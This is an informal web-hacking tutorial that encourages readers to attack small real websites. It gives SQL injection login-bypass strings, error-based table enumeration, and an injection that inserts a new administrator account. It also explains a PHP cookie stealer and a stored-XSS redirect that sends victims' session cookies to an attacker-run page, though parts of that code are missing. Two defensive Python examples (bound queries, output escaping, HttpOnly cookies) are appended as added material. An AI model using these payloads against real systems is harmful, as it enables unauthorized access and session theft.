
Real hacking in English and Romanian. Russians are asked not to enter.....

Documents about hacking.... By Parazitu

The goal of this project is to teach others the skills needed to take control of a webpage. We will go over the methods fairly quickly, but rest assured, we will provide links for further knowledge as that is what we are encouraging. The skills learned should be applied in an ethical manner - we don’t want anyone getting arrested as a result of this paper. We also hope everyone is able to use common sense and go after small sites, which don’t handle credit card numbers etc. If you break into one of these sites with paypal info you will be fucked.

Please enjoy this paper and use caution when attacking a website.

Good luck and have fun.

Knowing Your Enemy [0b]

Although this tutorial is focused mainly on web based attacks it is very important to enumerate your target. Using certain tools (the non-skiddie kind) we are able to find out what ports are open, the OS of the server and other important data. The first thing we should do is scan the target for open ports using a port scanner. I use Super Scanner 4.0 by Foundstone because it has a nice GUI, but others will argue NMAP is a much better scanner.

Once the ports are scanned and we have jotted down, in a text file, which ports they are and what services run on them, we can run a directory mapping program. The favored program is something called Intellitamper which maps out directories - sometimes disclosing hidden directories that you weren’t meant to find!

To gather more information, such as the registrar of the domain, we can use online resources such as whois.networksolutions.com and dnsstuff.com, which both give us valuable information on the target.

SQL Injection Login Bypass [1a]

Welcome to the wonderful world of SQL Injections. This first method is the easiest. This section will be short and straightforward.
What we will be doing is injecting into the login username and password section in order to fool the server into giving us access. When attempting to attack a site this should probably be the first method you try.

Our injection will look something like this:

‘OR 1=1--

Yes, it’s that simple. We will put this in the username and password fields. By doing this we are tricking the SQL query into giving us privileges on the website.

There is another method where you are able to inject into the URL. This technique is essentially the same. Example:

www.target.com/index.php?id=0

This is what the target website’s page looks like. We are going to inject into the id= part of the URL. Hopefully this will give us a positive login and we will have privileges. Our injection might look something like this:

www.target.com/index.php?id=0 ‘OR 1=1--

This method is sometimes referred to as ’Blind SQL Injection’ as we don’t exactly know what this will do (hence ’blind’).

Both methods have the same outcome. There are several injections that are commonly used such as:

admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
‘hi or 1=1--

The injections work basically the same, other than that some will get past different filter settings, depending on what the admin of the site has them set to.

Points for Further Knowledge:
http://www.sqlsecurity.com/ - General SQL Security/Injection information
http://w3schools.com/sql/default.asp - Learning the SQL language

SQL Injection - Table Modification [1b]

This method is one of the more advanced SQL Injection methods. There are three steps. First, we have to generate an error so that we can see the table names (so that we can create a privileged account). Next we have to generate a slightly different error to gain another important table name. Finally, we will inject SQL in order to create a new administrator account.

To accomplish our first goal we will inject something like the following:

Username: ‘Having1=1--

Enter this and leave the password field blank.
Once this is injected we will, hopefully, receive an error message that will reveal a table name. We are hoping to get an error such as this:

Column user_member.user_id is invalid and was not found etc.

The error will be longer than that but all we really need is the table name, ‘user_member.id’. Next, we will inject some SQL so that we can produce yet another error. Like so:

‘UNION SELECT * FROM user_member WHERE USER_ID=‘admin’ GROUP BY USER_ID HAVING 1=1;--

Now we have generated another error. The error may look something like the following:

Column user_member.user_id is invalid and was not found … Column user_member.passwd is invalid and was not found etc.

The above example shows us that user_member.passwd holds the passwords. We will now attempt to create another user, thus gaining us privileges. Use the below code in the Username field to insert the user:

‘INSERT INTO user_member (USER_NAME, LOGIN_ID, PASSWORD,CREATION_DATE) VALUES(‘Ethernet’,’hacked’,’hacked’,GETDATE();--

Success! We can now login with the username ‘Ethernet’ and the password ‘hacked’.

Please note that the errors have been shortened down and everything simplified for the purpose of this paper. This concludes the SQL Injection module of this paper.

Points for Further Knowledge:
http://w3schools.com/sql/default.asp - Learning the SQL language
(It is highly recommended that you read the information provided in the above link, it is essential for expanding your SQL Injection skills)

XSS - Cookie Stealer [2a]

First off, XSS (or CSS) stands for Cross Site Scripting. What we will learn today, specifically, is how to inject code into a guest book or insecure forum so that the users’ cookies will be logged.

Cookies are used on a lot of websites to verify authentication. The cookies are unique for each user. So, if we take the cookies we are technically able to become that user.

Now, let’s get down to it with some cookie stealer code.
We’ll need to have a subdomain to host this on so you can get one at dajoob (www.dajoob.com), which I prefer. So, once we have this we can use the following PHP code for our cookie stealer:

Name this file ‘stealer.php’. This is the basis of our cookie stealer. Let’s quickly run through this line-by-line.

$cookie = $_GET['cookie'];
This sets the variable $cookie to whatever is inputted as $_GET[‘cookie’]. This is important because this is what stores the user’s cookie value.

$log = fopen("cookies11.txt","a");
This sets the variable $log to the opened text file ‘cookies11.txt’; the “a” argument opens it in append mode so that it can be written to.

fwrite($log, $cookie ."\n");
Writes the user cookie to the log file.

fclose($log);
Closes the log file.

Now that we understand how the code works we can move on to the xss injection part of this section. You must realize that there must be, what’s known as, a permanent xss hole in the web application. A permanent xss usually pertains to something like a guestbook or forum. To test whether we are able to inject xss into the forum insert the following test script:

If there is a hole the text “Testing For XSS Hole” will show up in an alert box. Now, then, if all is well and we have a permanent xss hole we can enter the following redirect code:

This code redirects the user to http://yoursite.com/stealer.php and then adds the user’s cookie to the end. If we now check our file there should be a user cookie inside ‘cookies11.txt’.
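
Why the login bypass in [1a] works, and what stops it and the error-driven probing in [1b]: the sketch below is an added example, not code from this paper. It puts a string-built login query beside a parameter-bound one and keeps database error text out of the response. The SQLite table, the sample row and every function name are assumptions made for the illustration.

```python
import logging
import sqlite3

BYPASS = "' OR 1=1--"  # the paper's login-bypass string, typed with an ASCII apostrophe

def make_db():
    """Constructed sample table; plaintext password only to keep the example short."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user_member (user_name TEXT, passwd TEXT)")
    db.execute("INSERT INTO user_member VALUES ('admin', 'constructed-pw')")
    return db

def login_concat(db, user, password):
    # Vulnerable: input becomes part of the SQL text, so a quote ends the string
    # literal and "--" comments out the password check.
    sql = ("SELECT user_name FROM user_member "
           f"WHERE user_name = '{user}' AND passwd = '{password}'")
    return db.execute(sql).fetchone() is not None

def login_bound(db, user, password):
    # Hardened: the SQL text is fixed; input is bound as data and never parsed as SQL.
    sql = "SELECT user_name FROM user_member WHERE user_name = ? AND passwd = ?"
    return db.execute(sql, (user, password)).fetchone() is not None

def respond(login_fn, db, user, password):
    """Return what the client sees; database error text stays in the server log."""
    try:
        ok = login_fn(db, user, password)
    except sqlite3.Error as exc:
        logging.warning("login query failed: %s", exc)
        return "Login failed"
    return "Welcome" if ok else "Login failed"

if __name__ == "__main__":
    db = make_db()
    for fn in (login_concat, login_bound):
        print(fn.__name__, "->", respond(fn, db, BYPASS, BYPASS))
```

With bound parameters the quote and the comment marker are compared as literal characters of a user name, and because `respond` never echoes the driver's error text, the column and table names that [1b] depends on do not reach the client.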
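
The two server-side controls that defeat the cookie logging described in [2a], as an added example that is not part of the original paper: encode guestbook input on output so a stored script renders as text, and mark the session cookie HttpOnly so page script cannot read it. The function names, the sample entry and the session value are constructed for the illustration; `visible_to_script` is a simplified model of what `document.cookie` exposes.

```python
import html
from http.cookies import SimpleCookie

SAMPLE_ENTRY = "<script>alert(1)</script>"  # constructed guestbook input

def render_entry(author, message, escape=True):
    """Render one guestbook entry; escape=False reproduces the permanent XSS hole."""
    if escape:
        author, message = html.escape(author), html.escape(message)
    return f"<li><b>{author}</b>: {message}</li>"

def session_cookie(session_id, hardened=True):
    """Build the Set-Cookie value for the session cookie."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["path"] = "/"
    if hardened:
        jar["session"]["httponly"] = True    # hidden from document.cookie
        jar["session"]["secure"] = True      # sent over HTTPS only
        jar["session"]["samesite"] = "Lax"   # not attached to most cross-site requests
    return jar["session"].OutputString()

def visible_to_script(set_cookie_values):
    """Model document.cookie: name=value pairs of cookies not marked HttpOnly."""
    visible = []
    for value in set_cookie_values:
        parts = [p.strip() for p in value.split(";")]
        if not any(p.lower() == "httponly" for p in parts[1:]):
            visible.append(parts[0])
    return "; ".join(visible)

if __name__ == "__main__":
    print(render_entry("guest", SAMPLE_ENTRY, escape=False))
    print(render_entry("guest", SAMPLE_ENTRY))
    for hardened in (False, True):
        header = session_cookie("abc123", hardened)
        print(header, "| script sees:", repr(visible_to_script([header])))
```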